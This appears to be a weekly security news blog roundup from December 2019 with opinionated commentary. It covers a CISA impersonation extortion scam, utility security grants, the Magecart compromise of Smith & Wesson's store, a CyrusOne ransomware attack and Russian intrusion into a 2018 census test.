Security News for the Week Ending December 6, 2019
Caller Poses as CISA Rep in Extortion Scam
Homeland Security’s CISA (Cybersecurity and Infrastructure Security Agency) says that they are aware of a scam where a caller pretends to be a CISA rep and claims to have knowledge of the potential victim’s questionable behavior. The caller then attempts to extort the potential victim.
CISA says not to fall for the scam, do not pay the extortion and contact the FBI. Source: Homeland Security.
Senate Committee Approves $250 Mil for Utility Security
The PROTECT program would provide grants for utilities to improve their security. Given that a carefully distributed government report says that the Russians (and not the Chinese) have compromised a number of US utilities already, improving security is probably a smart idea. The nice part is that it is a grant. The important part is that the money would be spread out over 5 years, so in reality, we are talking about spending $50 million a year. It also seems to be focused on electric and doesn’t seem to consider water or other utilities. There are around 3,300 electric utilities alone in the US. If we ignore everything but electric and spread the money equally (which of course, they won’t), every utility would get $15,000. That will definitely get the job done. NOT! Source: Nextgov
Smith & Wesson’s online Store Hacked by Magecart
Lawrence Abrams of Bleeping Computer fame tried to warn Smith & Wesson that their online store had been compromised by the famous Magecart malware. The join the likes of British Airways (183 million Euro fine) and thousands of others. Abrams did not hear back from them by publication time. Source: Bleeping Computer
Another MSP Hit by Ransomware Attack
CyrusOne, one of the larger MSPs was hit by a ransomware attack which affected some of their customers. As I said in my blog post earlier this week, attacks against MSPs are up because they are juicier targets.
In CyrusOne’s case, they said the victims were primarily in a data center in New York (which hopefully means that they have segmented their network), it did not affect their colo customers, only their managed customers (because in a colo, the provider does not have credentials to their customer’s servers) and they are investigating.
This just is one more reminder that you can outsource responsibility to a service provider, but the buck still stops with you when the provider is hacked. Source: MSSP Alert
Reuters Says Census Test Run in 2018 Was Attacked By Russia
Commerce outsourced the first digital census to Pegasystems and at last check the cost has doubled to $167 million. More importantly, in a 2018 test, Russian hackers (not China) were able to penetrate a firewall and get into places where they should not have been. In addition, the test was hit with DNS attacks.
Sources say this raises concerns whether T-Rex Solutions, the Commerce Department’s main security contractor, can keep the Russians out when the site actually goes live. Or the Chinese. Or other countries that would like to embarrass us.
Census said (a) no comment, (b) no data was stolen (this was likely a reconnaissance test by the Russians, so no surprise) and (c) the system worked as designed (i.e. the Russians got in and we panicked).
Clearly if the Russians are able to compromise the Census, that would be a HUGE black eye for this President and the Executive Branch.
They can hide things during a test, but cannot hide them when it goes live, so lets hope they are able to fix it. Source: Reuters